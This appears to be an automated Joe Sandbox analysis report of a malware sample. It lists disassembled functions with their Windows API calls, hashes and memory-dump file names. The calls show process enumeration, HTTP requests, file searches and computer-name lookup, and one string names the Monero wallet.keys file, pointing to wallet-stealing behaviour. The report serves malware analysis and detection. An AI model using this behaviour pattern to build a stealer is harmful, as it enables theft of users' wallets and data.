Function 003D8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003E05B7), ref: 003D86CA
Process32First.KERNEL32(?,00000128), ref: 003D86DE
Process32Next.KERNEL32(?,00000128), ref: 003D86F3

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

CloseHandle.KERNEL32(?), ref: 003D8761

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: ce2e8a11d554f8b0399db17626b791ae9937bd40ec949a1da291337a113fcd98
Instruction ID: 71835566a8336b9fcc564a1edf9b9a3374d47c6a0454e4ef1681df4f4acc1aa5
Opcode Fuzzy Hash: ce2e8a11d554f8b0399db17626b791ae9937bd40ec949a1da291337a113fcd98
Instruction Fuzzy Hash: BF316D72901658ABCB26DF91ED41FEEB778FF45700F10419AE50AA62A0DB306E45CFA1

Function 003D6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EB88A0,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003D6AE8
CloseHandle.KERNEL32(00000000), ref: 003D6AF9
Sleep.KERNEL32(00001770), ref: 003D6B04
CloseHandle.KERNEL32(?,00000000,?,00EB88A0,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6B1A
ExitProcess.KERNEL32 ref: 003D6B22

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: aaaad893e9565f5d8cf48dd087d08ced2aedd797c9ed9eaac2d1238a5ae2b995
Instruction ID: 1973ea1889adf4a3b2d587c21ab983f77304832c53d06fb73c50aa05336d8a5a
Opcode Fuzzy Hash: aaaad893e9565f5d8cf48dd087d08ced2aedd797c9ed9eaac2d1238a5ae2b995
Instruction Fuzzy Hash: 69F05E72984319ABEB02ABE0EC07BBE7B38EB04741F10851BF523A53C1DBB05540D656

Function 003C47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Strings

<, xrefs: 003C47C9

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: ae53306de2cdec63cb3359802fe4a62272e1c4155e556d0973229a19c27da278
Instruction ID: c84875ab61a63ddacd0509d0eeee5d2419c6eb7396017ce89fc7bba777b70a66
Opcode Fuzzy Hash: ae53306de2cdec63cb3359802fe4a62272e1c4155e556d0973229a19c27da278
Instruction Fuzzy Hash: 91214DB1D00209ABDF14DFA4E945BDE7B75FB45320F108629F929AB2C0EB706A05CF91

Function 003D51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C6280: InternetOpenA.WININET(003E0DFE,00000001,00000000,00000000,00000000), ref: 003C62E1
Part of subcall function 003C6280: StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C6303
Part of subcall function 003C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C6335
Part of subcall function 003C6280: HttpOpenRequestA.WININET(00000000,GET,?,00EBDAF0,00000000,00000000,00400100,00000000), ref: 003C6385
Part of subcall function 003C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003C63BF
Part of subcall function 003C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003C63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5228

Strings

ERROR, xrefs: 003D521A
ERROR, xrefs: 003D5273

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 8989aca64e4269622bcf78041d85d803de3f7e3f68de4a41bd3cab598ce86763
Instruction ID: 4fe482da4ce15236ef5c9599caa44dc6acedd05605364ae338439baada0155fa
Opcode Fuzzy Hash: 8989aca64e4269622bcf78041d85d803de3f7e3f68de4a41bd3cab598ce86763
Instruction Fuzzy Hash: 7E113332900548A7CB16FFB0EE52EED7738AF50300F404559F80A4E692EF70AB15D791

Function 003D4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4F7A
lstrcat.KERNEL32(?,003E1070), ref: 003D4F97
lstrcat.KERNEL32(?,00EB8BB0), ref: 003D4FAB
lstrcat.KERNEL32(?,003E1074), ref: 003D4FBD

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a25a3a27e15305c5570df46d6c0a3af90f179a99a330e8b3f0f2c0feb29df396
Instruction ID: c7242fb62f9e9fd22e44a526e2a3e2e95686f3453b78fe237294101295d52b4f
Opcode Fuzzy Hash: a25a3a27e15305c5570df46d6c0a3af90f179a99a330e8b3f0f2c0feb29df396
Instruction Fuzzy Hash: 4E21DA7794030867C755FBB0EC46EEE333DAB54340F004559B68997181EE74EBC98B92

Function 003D0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00EB8A80), ref: 003D079A
StrCmpCA.SHLWAPI(00000000,00EB8B00), ref: 003D0866
StrCmpCA.SHLWAPI(00000000,00EB8AA0), ref: 003D099D

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 2ed8e56b425f245a5214c1d338a4a45858a14462a315eae101e8b4047accbc1e
Instruction ID: c2f8f0abb1e0edb14aee41a9e220c3379b5278bc867f1d20f0ef20975c534d3d
Opcode Fuzzy Hash: 2ed8e56b425f245a5214c1d338a4a45858a14462a315eae101e8b4047accbc1e
Instruction Fuzzy Hash: C7916876A102489FCB29EF64DA95FED77B5FF95300F408519E80A9F341DB309A05CB92

Function 003D0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00EB8A80), ref: 003D079A
StrCmpCA.SHLWAPI(00000000,00EB8B00), ref: 003D0866
StrCmpCA.SHLWAPI(00000000,00EB8AA0), ref: 003D099D

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7186e2453f27848d50e6d0bd276676bbe995007dcf1fb52c20ab480d67ed9de8
Instruction ID: 6a1711047d26f24a8f68ff63a5a6d45217a6c9d58c242bef0a995159fa45b265
Opcode Fuzzy Hash: 7186e2453f27848d50e6d0bd276676bbe995007dcf1fb52c20ab480d67ed9de8
Instruction Fuzzy Hash: 69815675B102489FCB19EF64DA91BEDB7B6FF94300F508519E8099F351DB30AA06CB82

Function 003D78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
